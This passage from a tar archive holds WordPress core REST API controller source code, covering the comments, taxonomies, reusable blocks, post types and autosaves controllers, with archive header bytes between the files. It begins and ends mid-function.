$old_status = wp_get_comment_status( $comment_id );
if ( $new_status === $old_status ) {
return false;
}
switch ( $new_status ) {
case 'approved' :
case 'approve':
case '1':
$changed = wp_set_comment_status( $comment_id, 'approve' );
break;
case 'hold':
case '0':
$changed = wp_set_comment_status( $comment_id, 'hold' );
break;
case 'spam' :
$changed = wp_spam_comment( $comment_id );
break;
case 'unspam' :
$changed = wp_unspam_comment( $comment_id );
break;
case 'trash' :
$changed = wp_trash_comment( $comment_id );
break;
case 'untrash' :
$changed = wp_untrash_comment( $comment_id );
break;
default :
$changed = false;
break;
}
return $changed;
}
/**
* Checks if the post can be read.
*
* Correctly handles posts with the inherit status.
*
* @since 4.7.0
*
* @param WP_Post $post Post object.
* @param WP_REST_Request $request Request data to check.
* @return bool Whether post can be read.
*/
protected function check_read_post_permission( $post, $request ) {
$posts_controller = new WP_REST_Posts_Controller( $post->post_type );
$post_type = get_post_type_object( $post->post_type );
$has_password_filter = false;
// Only check password if a specific post was queried for or a single comment
$requested_post = ! empty( $request['post'] ) && ( !is_array( $request['post'] ) || 1 === count( $request['post'] ) );
$requested_comment = ! empty( $request['id'] );
if ( ( $requested_post || $requested_comment ) && $posts_controller->can_access_password_content( $post, $request ) ) {
add_filter( 'post_password_required', '__return_false' );
$has_password_filter = true;
}
if ( post_password_required( $post ) ) {
$result = current_user_can( $post_type->cap->edit_post, $post->ID );
} else {
$result = $posts_controller->check_read_permission( $post );
}
if ( $has_password_filter ) {
remove_filter( 'post_password_required', '__return_false' );
}
return $result;
}
/**
* Checks if the comment can be read.
*
* @since 4.7.0
*
* @param WP_Comment $comment Comment object.
* @param WP_REST_Request $request Request data to check.
* @return bool Whether the comment can be read.
*/
protected function check_read_permission( $comment, $request ) {
if ( ! empty( $comment->comment_post_ID ) ) {
$post = get_post( $comment->comment_post_ID );
if ( $post ) {
if ( $this->check_read_post_permission( $post, $request ) && 1 === (int) $comment->comment_approved ) {
return true;
}
}
}
if ( 0 === get_current_user_id() ) {
return false;
}
if ( empty( $comment->comment_post_ID ) && ! current_user_can( 'moderate_comments' ) ) {
return false;
}
if ( ! empty( $comment->user_id ) && get_current_user_id() === (int) $comment->user_id ) {
return true;
}
return current_user_can( 'edit_comment', $comment->comment_ID );
}
/**
* Checks if a comment can be edited or deleted.
*
* @since 4.7.0
*
* @param object $comment Comment object.
* @return bool Whether the comment can be edited or deleted.
*/
protected function check_edit_permission( $comment ) {
if ( 0 === (int) get_current_user_id() ) {
return false;
}
if ( ! current_user_can( 'moderate_comments' ) ) {
return false;
}
return current_user_can( 'edit_comment', $comment->comment_ID );
}
/**
* Checks a comment author email for validity.
*
* Accepts either a valid email address or empty string as a valid comment
* author email address. Setting the comment author email to an empty
* string is allowed when a comment is being updated.
*
* @since 4.7.0
*
* @param string $value Author email value submitted.
* @param WP_REST_Request $request Full details about the request.
* @param string $param The parameter name.
* @return WP_Error|string The sanitized email address, if valid,
* otherwise an error.
*/
public function check_comment_author_email( $value, $request, $param ) {
$email = (string) $value;
if ( empty( $email ) ) {
return $email;
}
$check_email = rest_validate_request_arg( $email, $request, $param );
if ( is_wp_error( $check_email ) ) {
return $check_email;
}
return $email;
}
}
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-taxonomies-controller.php���������������������������������������������������0000666�����������������00000025666�15111427772�0016363 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Taxonomies_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage taxonomies via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Taxonomies_Controller extends WP_REST_Controller {
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'taxonomies';
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<taxonomy>[\w-]+)', array(
'args' => array(
'taxonomy' => array(
'description' => __( 'An alphanumeric identifier for the taxonomy.' ),
'type' => 'string',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks whether a given request has permission to read taxonomies.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
if ( 'edit' === $request['context'] ) {
if ( ! empty( $request['type'] ) ) {
$taxonomies = get_object_taxonomies( $request['type'], 'objects' );
} else {
$taxonomies = get_taxonomies( '', 'objects' );
}
foreach ( $taxonomies as $taxonomy ) {
if ( ! empty( $taxonomy->show_in_rest ) && current_user_can( $taxonomy->cap->assign_terms ) ) {
return true;
}
}
return new WP_Error( 'rest_cannot_view', __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves all public taxonomies.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
if ( isset( $registered['type'] ) && ! empty( $request['type'] ) ) {
$taxonomies = get_object_taxonomies( $request['type'], 'objects' );
} else {
$taxonomies = get_taxonomies( '', 'objects' );
}
$data = array();
foreach ( $taxonomies as $tax_type => $value ) {
if ( empty( $value->show_in_rest ) || ( 'edit' === $request['context'] && ! current_user_can( $value->cap->assign_terms ) ) ) {
continue;
}
$tax = $this->prepare_item_for_response( $value, $request );
$tax = $this->prepare_response_for_collection( $tax );
$data[ $tax_type ] = $tax;
}
if ( empty( $data ) ) {
// Response should still be returned as a JSON object when it is empty.
$data = (object) $data;
}
return rest_ensure_response( $data );
}
/**
* Checks if a given request has access to a taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has read access for the item, otherwise false or WP_Error object.
*/
public function get_item_permissions_check( $request ) {
$tax_obj = get_taxonomy( $request['taxonomy'] );
if ( $tax_obj ) {
if ( empty( $tax_obj->show_in_rest ) ) {
return false;
}
if ( 'edit' === $request['context'] && ! current_user_can( $tax_obj->cap->assign_terms ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
return true;
}
/**
* Retrieves a specific taxonomy.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$tax_obj = get_taxonomy( $request['taxonomy'] );
if ( empty( $tax_obj ) ) {
return new WP_Error( 'rest_taxonomy_invalid', __( 'Invalid taxonomy.' ), array( 'status' => 404 ) );
}
$data = $this->prepare_item_for_response( $tax_obj, $request );
return rest_ensure_response( $data );
}
/**
* Prepares a taxonomy object for serialization.
*
* @since 4.7.0
*
* @param stdClass $taxonomy Taxonomy data.
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $taxonomy, $request ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'name', $fields, true ) ) {
$data['name'] = $taxonomy->label;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $taxonomy->name;
}
if ( in_array( 'capabilities', $fields, true ) ) {
$data['capabilities'] = $taxonomy->cap;
}
if ( in_array( 'description', $fields, true ) ) {
$data['description'] = $taxonomy->description;
}
if ( in_array( 'labels', $fields, true ) ) {
$data['labels'] = $taxonomy->labels;
}
if ( in_array( 'types', $fields, true ) ) {
$data['types'] = $taxonomy->object_type;
}
if ( in_array( 'show_cloud', $fields, true ) ) {
$data['show_cloud'] = $taxonomy->show_tagcloud;
}
if ( in_array( 'hierarchical', $fields, true ) ) {
$data['hierarchical'] = $taxonomy->hierarchical;
}
if ( in_array( 'rest_base', $fields, true ) ) {
$data['rest_base'] = $base;
}
if ( in_array( 'visibility', $fields, true ) ) {
$data['visibility'] = array(
'public' => (bool) $taxonomy->public,
'publicly_queryable' => (bool) $taxonomy->publicly_queryable,
'show_admin_column' => (bool) $taxonomy->show_admin_column,
'show_in_nav_menus' => (bool) $taxonomy->show_in_nav_menus,
'show_in_quick_edit' => (bool) $taxonomy->show_in_quick_edit,
'show_ui' => (bool) $taxonomy->show_ui,
);
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
$response->add_links( array(
'collection' => array(
'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ),
),
'https://api.w.org/items' => array(
'href' => rest_url( sprintf( 'wp/v2/%s', $base ) ),
),
) );
/**
* Filters a taxonomy returned from the REST API.
*
* Allows modification of the taxonomy data right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param object $item The original taxonomy object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_taxonomy', $response, $taxonomy, $request );
}
/**
* Retrieves the taxonomy's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'taxonomy',
'type' => 'object',
'properties' => array(
'capabilities' => array(
'description' => __( 'All capabilities used by the taxonomy.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'description' => array(
'description' => __( 'A human-readable description of the taxonomy.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'hierarchical' => array(
'description' => __( 'Whether or not the taxonomy should have children.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'labels' => array(
'description' => __( 'Human-readable labels for the taxonomy for various contexts.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'name' => array(
'description' => __( 'The title for the taxonomy.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the taxonomy.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'show_cloud' => array(
'description' => __( 'Whether or not the term cloud should be displayed.' ),
'type' => 'boolean',
'context' => array( 'edit' ),
'readonly' => true,
),
'types' => array(
'description' => __( 'Types associated with the taxonomy.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'visibility' => array(
'description' => __( 'The visibility settings for the taxonomy.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'rest_base' => array(
'description' => __( 'REST base route for the taxonomy.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$new_params = array();
$new_params['context'] = $this->get_context_param( array( 'default' => 'view' ) );
$new_params['type'] = array(
'description' => __( 'Limit results to taxonomies associated with a specific post type.' ),
'type' => 'string',
);
return $new_params;
}
}
��������������������������������������������������������������������������endpoints/class-wp-rest-blocks-controller.php�������������������������������������������������������0000666�����������������00000005216�15111427772�0015437 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* Reusable blocks REST API: WP_REST_Blocks_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Controller which provides a REST endpoint for the editor to read, create,
* edit and delete reusable blocks. Blocks are stored as posts with the wp_block
* post type.
*
* @since 5.0.0
*
* @see WP_REST_Posts_Controller
* @see WP_REST_Controller
*/
class WP_REST_Blocks_Controller extends WP_REST_Posts_Controller {
/**
* Checks if a block can be read.
*
* @since 5.0.0
*
* @param object $post Post object that backs the block.
* @return bool Whether the block can be read.
*/
public function check_read_permission( $post ) {
// Ensure that the user is logged in and has the read_blocks capability.
$post_type = get_post_type_object( $post->post_type );
if ( ! current_user_can( $post_type->cap->read_post, $post->ID ) ) {
return false;
}
return parent::check_read_permission( $post );
}
/**
* Filters a response based on the context defined in the schema.
*
* @since 5.0.0
*
* @param array $data Response data to fiter.
* @param string $context Context defined in the schema.
* @return array Filtered response.
*/
public function filter_response_by_context( $data, $context ) {
$data = parent::filter_response_by_context( $data, $context );
/*
* Remove `title.rendered` and `content.rendered` from the response. It
* doesn't make sense for a reusable block to have rendered content on its
* own, since rendering a block requires it to be inside a post or a page.
*/
unset( $data['title']['rendered'] );
unset( $data['content']['rendered'] );
return $data;
}
/**
* Retrieves the block's schema, conforming to JSON Schema.
*
* @since 5.0.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = parent::get_item_schema();
/*
* Allow all contexts to access `title.raw` and `content.raw`. Clients always
* need the raw markup of a reusable block to do anything useful, e.g. parse
* it or display it in an editor.
*/
$schema['properties']['title']['properties']['raw']['context'] = array( 'view', 'edit' );
$schema['properties']['content']['properties']['raw']['context'] = array( 'view', 'edit' );
/*
* Remove `title.rendered` and `content.rendered` from the schema. It doesn’t
* make sense for a reusable block to have rendered content on its own, since
* rendering a block requires it to be inside a post or a page.
*/
unset( $schema['properties']['title']['properties']['rendered'] );
unset( $schema['properties']['content']['properties']['rendered'] );
return $schema;
}
}
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-post-types-controller.php���������������������������������������������������0000666�����������������00000023113�15111427772�0016305 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Post_Types_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class to access post types via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Post_Types_Controller extends WP_REST_Controller {
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'types';
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<type>[\w-]+)', array(
'args' => array(
'type' => array(
'description' => __( 'An alphanumeric identifier for the post type.' ),
'type' => 'string',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks whether a given request has permission to read types.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|true True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
if ( 'edit' === $request['context'] ) {
foreach ( get_post_types( array(), 'object' ) as $post_type ) {
if ( ! empty( $post_type->show_in_rest ) && current_user_can( $post_type->cap->edit_posts ) ) {
return true;
}
}
return new WP_Error( 'rest_cannot_view', __( 'Sorry, you are not allowed to edit posts in this post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Retrieves all public post types.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
$data = array();
foreach ( get_post_types( array(), 'object' ) as $obj ) {
if ( empty( $obj->show_in_rest ) || ( 'edit' === $request['context'] && ! current_user_can( $obj->cap->edit_posts ) ) ) {
continue;
}
$post_type = $this->prepare_item_for_response( $obj, $request );
$data[ $obj->name ] = $this->prepare_response_for_collection( $post_type );
}
return rest_ensure_response( $data );
}
/**
* Retrieves a specific post type.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
$obj = get_post_type_object( $request['type'] );
if ( empty( $obj ) ) {
return new WP_Error( 'rest_type_invalid', __( 'Invalid post type.' ), array( 'status' => 404 ) );
}
if ( empty( $obj->show_in_rest ) ) {
return new WP_Error( 'rest_cannot_read_type', __( 'Cannot view post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( 'edit' === $request['context'] && ! current_user_can( $obj->cap->edit_posts ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit posts in this post type.' ), array( 'status' => rest_authorization_required_code() ) );
}
$data = $this->prepare_item_for_response( $obj, $request );
return rest_ensure_response( $data );
}
/**
* Prepares a post type object for serialization.
*
* @since 4.7.0
*
* @param stdClass $post_type Post type data.
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $post_type, $request ) {
$taxonomies = wp_list_filter( get_object_taxonomies( $post_type->name, 'objects' ), array( 'show_in_rest' => true ) );
$taxonomies = wp_list_pluck( $taxonomies, 'name' );
$base = ! empty( $post_type->rest_base ) ? $post_type->rest_base : $post_type->name;
$supports = get_all_post_type_supports( $post_type->name );
$fields = $this->get_fields_for_response( $request );
$data = array();
if ( in_array( 'capabilities', $fields, true ) ) {
$data['capabilities'] = $post_type->cap;
}
if ( in_array( 'description', $fields, true ) ) {
$data['description'] = $post_type->description;
}
if ( in_array( 'hierarchical', $fields, true ) ) {
$data['hierarchical'] = $post_type->hierarchical;
}
if ( in_array( 'viewable', $fields, true ) ) {
$data['viewable'] = is_post_type_viewable( $post_type );
}
if ( in_array( 'labels', $fields, true ) ) {
$data['labels'] = $post_type->labels;
}
if ( in_array( 'name', $fields, true ) ) {
$data['name'] = $post_type->label;
}
if ( in_array( 'slug', $fields, true ) ) {
$data['slug'] = $post_type->name;
}
if ( in_array( 'supports', $fields, true ) ) {
$data['supports'] = $supports;
}
if ( in_array( 'taxonomies', $fields, true ) ) {
$data['taxonomies'] = array_values( $taxonomies );
}
if ( in_array( 'rest_base', $fields, true ) ) {
$data['rest_base'] = $base;
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->add_additional_fields_to_object( $data, $request );
$data = $this->filter_response_by_context( $data, $context );
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
$response->add_links( array(
'collection' => array(
'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ),
),
'https://api.w.org/items' => array(
'href' => rest_url( sprintf( 'wp/v2/%s', $base ) ),
),
) );
/**
* Filters a post type returned from the API.
*
* Allows modification of the post type data right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param object $item The original post type object.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_post_type', $response, $post_type, $request );
}
/**
* Retrieves the post type's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'type',
'type' => 'object',
'properties' => array(
'capabilities' => array(
'description' => __( 'All capabilities used by the post type.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'description' => array(
'description' => __( 'A human-readable description of the post type.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'hierarchical' => array(
'description' => __( 'Whether or not the post type should have children.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'viewable' => array(
'description' => __( 'Whether or not the post type can be viewed.' ),
'type' => 'boolean',
'context' => array( 'edit' ),
'readonly' => true,
),
'labels' => array(
'description' => __( 'Human-readable labels for the post type for various contexts.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'name' => array(
'description' => __( 'The title for the post type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'slug' => array(
'description' => __( 'An alphanumeric identifier for the post type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'supports' => array(
'description' => __( 'All features, supported by the post type.' ),
'type' => 'object',
'context' => array( 'edit' ),
'readonly' => true,
),
'taxonomies' => array(
'description' => __( 'Taxonomies associated with post type.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'rest_base' => array(
'description' => __( 'REST base route for the post type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for collections.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
return array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
);
}
}
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-autosaves-controller.php����������������������������������������������������0000666�����������������00000031056�15111427772�0016175 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Autosaves_Controller class.
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Core class used to access autosaves via the REST API.
*
* @since 5.0.0
*
* @see WP_REST_Controller
*/
class WP_REST_Autosaves_Controller extends WP_REST_Revisions_Controller {
/**
* Parent post type.
*
* @since 5.0.0
* @var string
*/
private $parent_post_type;
/**
* Parent post controller.
*
* @since 5.0.0
* @var WP_REST_Controller
*/
private $parent_controller;
/**
* Revision controller.
*
* @since 5.0.0
* @var WP_REST_Controller
*/
private $revisions_controller;
/**
* The base of the parent controller's route.
*
* @since 5.0.0
* @var string
*/
private $parent_base;
/**
* Constructor.
*
* @since 5.0.0
*
* @param string $parent_post_type Post type of the parent.
*/
public function __construct( $parent_post_type ) {
$this->parent_post_type = $parent_post_type;
$post_type_object = get_post_type_object( $parent_post_type );
// Ensure that post type-specific controller logic is available.
$parent_controller_class = ! empty( $post_type_object->rest_controller_class ) ? $post_type_object->rest_controller_class : 'WP_REST_Posts_Controller';
$this->parent_controller = new $parent_controller_class( $post_type_object->name );
$this->revisions_controller = new WP_REST_Revisions_Controller( $parent_post_type );
$this->rest_namespace = 'wp/v2';
$this->rest_base = 'autosaves';
$this->parent_base = ! empty( $post_type_object->rest_base ) ? $post_type_object->rest_base : $post_type_object->name;
}
/**
* Registers routes for autosaves.
*
* @since 5.0.0
*
* @see register_rest_route()
*/
public function register_routes() {
register_rest_route(
$this->rest_namespace,
'/' . $this->parent_base . '/(?P<id>[\d]+)/' . $this->rest_base,
array(
'args' => array(
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => array( $this, 'create_item' ),
'permission_callback' => array( $this, 'create_item_permissions_check' ),
'args' => $this->parent_controller->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
'schema' => array( $this, 'get_public_item_schema' ),
)
);
register_rest_route(
$this->rest_namespace,
'/' . $this->parent_base . '/(?P<parent>[\d]+)/' . $this->rest_base . '/(?P<id>[\d]+)',
array(
'args' => array(
'parent' => array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
),
'id' => array(
'description' => __( 'The ID for the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this->revisions_controller, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
)
);
}
/**
* Get the parent post.
*
* @since 5.0.0
*
* @param int $parent_id Supplied ID.
* @return WP_Post|WP_Error Post object if ID is valid, WP_Error otherwise.
*/
protected function get_parent( $parent_id ) {
return $this->revisions_controller->get_parent( $parent_id );
}
/**
* Checks if a given request has access to get autosaves.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full data about the request.
* @return true|WP_Error True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
$parent = $this->get_parent( $request['id'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
$parent_post_type_obj = get_post_type_object( $parent->post_type );
if ( ! current_user_can( $parent_post_type_obj->cap->edit_post, $parent->ID ) ) {
return new WP_Error( 'rest_cannot_read', __( 'Sorry, you are not allowed to view autosaves of this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
return true;
}
/**
* Checks if a given request has access to create an autosave revision.
*
* Autosave revisions inherit permissions from the parent post,
* check if the current user has permission to edit the post.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has access to create the item, WP_Error object otherwise.
*/
public function create_item_permissions_check( $request ) {
$id = $request->get_param( 'id' );
if ( empty( $id ) ) {
return new WP_Error( 'rest_post_invalid_id', __( 'Invalid item ID.' ), array( 'status' => 404 ) );
}
return $this->parent_controller->update_item_permissions_check( $request );
}
/**
* Creates, updates or deletes an autosave revision.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function create_item( $request ) {
if ( ! defined( 'DOING_AUTOSAVE' ) ) {
define( 'DOING_AUTOSAVE', true );
}
$post = get_post( $request['id'] );
if ( is_wp_error( $post ) ) {
return $post;
}
$prepared_post = $this->parent_controller->prepare_item_for_database( $request );
$prepared_post->ID = $post->ID;
$user_id = get_current_user_id();
if ( ( 'draft' === $post->post_status || 'auto-draft' === $post->post_status ) && $post->post_author == $user_id ) {
// Draft posts for the same author: autosaving updates the post and does not create a revision.
// Convert the post object to an array and add slashes, wp_update_post expects escaped array.
$autosave_id = wp_update_post( wp_slash( (array) $prepared_post ), true );
} else {
// Non-draft posts: create or update the post autosave.
$autosave_id = $this->create_post_autosave( (array) $prepared_post );
}
if ( is_wp_error( $autosave_id ) ) {
return $autosave_id;
}
$autosave = get_post( $autosave_id );
$request->set_param( 'context', 'edit' );
$response = $this->prepare_item_for_response( $autosave, $request );
$response = rest_ensure_response( $response );
return $response;
}
/**
* Get the autosave, if the ID is valid.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Post|WP_Error Revision post object if ID is valid, WP_Error otherwise.
*/
public function get_item( $request ) {
$parent_id = (int) $request->get_param( 'parent' );
if ( $parent_id <= 0 ) {
return new WP_Error( 'rest_post_invalid_id', __( 'Invalid parent post ID.' ), array( 'status' => 404 ) );
}
$autosave = wp_get_post_autosave( $parent_id );
if ( ! $autosave ) {
return new WP_Error( 'rest_post_no_autosave', __( 'There is no autosave revision for this post.' ), array( 'status' => 404 ) );
}
$response = $this->prepare_item_for_response( $autosave, $request );
return $response;
}
/**
* Gets a collection of autosaves using wp_get_post_autosave.
*
* Contains the user's autosave, for empty if it doesn't exist.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
$parent = $this->get_parent( $request['id'] );
if ( is_wp_error( $parent ) ) {
return $parent;
}
$response = array();
$parent_id = $parent->ID;
$revisions = wp_get_post_revisions( $parent_id, array( 'check_enabled' => false ) );
foreach ( $revisions as $revision ) {
if ( false !== strpos( $revision->post_name, "{$parent_id}-autosave" ) ) {
$data = $this->prepare_item_for_response( $revision, $request );
$response[] = $this->prepare_response_for_collection( $data );
}
}
return rest_ensure_response( $response );
}
/**
* Retrieves the autosave's schema, conforming to JSON Schema.
*
* @since 5.0.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$schema = $this->revisions_controller->get_item_schema();
$schema['properties']['preview_link'] = array(
'description' => __( 'Preview link for the post.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'edit' ),
'readonly' => true,
);
return $schema;
}
/**
* Creates autosave for the specified post.
*
* From wp-admin/post.php.
*
* @since 5.0.0
*
* @param mixed $post_data Associative array containing the post data.
* @return mixed The autosave revision ID or WP_Error.
*/
public function create_post_autosave( $post_data ) {
$post_id = (int) $post_data['ID'];
$post = get_post( $post_id );
if ( is_wp_error( $post ) ) {
return $post;
}
$user_id = get_current_user_id();
// Store one autosave per author. If there is already an autosave, overwrite it.
$old_autosave = wp_get_post_autosave( $post_id, $user_id );
if ( $old_autosave ) {
